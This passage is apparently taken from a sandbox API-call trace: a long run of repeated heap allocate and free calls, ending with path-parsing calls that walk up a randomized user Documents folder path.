hHeap=0x2c0000) returned 1 [0199.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0199.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0199.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2aeaea0 [0199.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0199.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0199.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0199.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0199.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0199.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0199.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0199.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.377] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.377] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0199.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.378] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.378] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0199.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.378] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0199.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0199.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.382] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.382] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0199.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0199.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0199.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0199.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0199.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0199.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.402] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\4E_Qp5b8\\") returned="4E_Qp5b8\\" [0199.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0199.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31ba80 [0199.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.403] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\") returned="HIm fL\\" [0199.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbbc0 [0199.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31ba80 | out: hHeap=0x2c0000) returned 1 [0199.403] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\") returned="8NNLi0kOEoM-mpUM785\\" [0199.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0199.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0199.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ade8a8 [0199.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbbc0 | out: hHeap=0x2c0000) returned 1 [0199.404] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0199.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 